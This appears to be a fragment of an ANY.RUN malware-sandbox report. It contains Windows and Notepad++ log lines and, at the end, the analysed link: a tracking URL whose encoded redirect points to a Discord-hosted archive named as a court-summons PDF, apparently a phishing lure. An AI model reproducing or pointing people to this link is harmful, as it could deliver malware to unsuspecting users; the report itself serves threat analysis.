[0321/172515.714:ERROR:filesystem_win.cc(130)] GetFileAttributes C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Crashpad\attachments\3a0ee62b-79ac-4cc3-bbd5-f65252e7a91f: The system cannot find the file specified. (0x2)
notepad++.exe
VerifyLibrary: certificate revocation checking is disabled
notepad++.exe
VerifyLibrary: C:\Program Files\Notepad++\SciLexer.dll
notepad++.exe
ED255D9151912E40DF048A56288E969A8D0DAFA3
notepad++.exe
VerifyLibrary: certificate revocation checking is disabled
notepad++.exe
VerifyLibrary: C:\Program Files\Notepad++\updater\gup.exe
notepad++.exe
ED255D9151912E40DF048A56288E969A8D0DAFA3
notepad++.exe
VerifyLibrary: C:\Program Files\Notepad++\plugins\Config\nppPluginList.dll
notepad++.exe
VerifyLibrary: certificate revocation checking is disabled
notepad++.exe
VerifyLibrary: certificate revocation checking is disabled
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
https://servicioselectronicos22.lt.acemlnc.com/Prod/link-tracker?redirectUrl=aHR0cHMlM0ElMkYlMkZjZG4uZGlzY29yZGFwcC5jb20lMkZhdHRhY2htZW50cyUyRjEyMDgwNDY1NTg5NzM3OTIzMjklMkYxMjIwMzM3MzQ4MDM0ODI2MjYwJTJGRklTQ0FMSUFfQ0lUQUNJT05FUy1QREYudGFyJTNGZXglM0Q2NjBlOTJiOCUyNmlzJTNENjVmYzFkYjglMjZobSUzRDcwYWQyZDViMGU1ODRkOWZiNTQxMjczNmYyZWEwZTc5ZTEwOTQwYTNlZGU2N2FiNTczYzIyOTUwNmQzNjRiNDclMjY=&sig=FhxubgPtUu9JCK1gwh6M2hh5MwTmoAM7wTipiAP3SRqg&iat=1711023987&a=%7C%7C28533470%7C%7C&account=servicioselectronicos22%2Eactivehosted%2Ecom&email=KAlmcUlQuqdBrJoLbrhAm3b9rwLswrACWOVmBt3EFypWyrCXhbsYMQinlHQubfjmKMljIhEgSqQ%3D%3ApJ58ZDz4j0B8v1es0iYoL0DMrRuL64gI&s=08d8f5642c2eddc64e297ba1c032dd0e&i=5A11A2A17